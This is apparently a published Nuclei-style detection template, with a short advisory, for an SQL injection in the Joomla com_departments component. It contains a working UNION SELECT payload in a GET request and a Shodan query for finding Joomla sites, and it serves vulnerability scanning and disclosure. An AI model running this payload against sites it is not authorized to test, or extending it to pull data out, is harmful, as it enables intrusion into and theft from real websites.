Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
PoC代码[已公开]
id: joomla-department-sqli
info:
name: Joomla `departments` - SQL Injection
author: ritikchaddha
severity: high
description: |
Joomla! `com_departments` parameter contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/opensec-cn/kunpeng/blob/master/plugin/json/joomla_departments_sqli.json
- https://github.com/w3bd0gs/cocoworker/blob/master/plugins/beebeeto/poc_2014_0170.py
metadata:
max-request: 1
shodan-query: http.component:"Joomla"
tags: joomla,sqli,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--"
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
# digest: 4a0a0047304502205ebb6b70c77a4f350918d0374392e6035f11ca4e1d49069fa87ce3aa251bd81b022100e1c99f4bff7e372804a3b23eb08678db549385cb31bab4539d0fe41508d47e7e:922c64590222798bb761d5b6d8e72950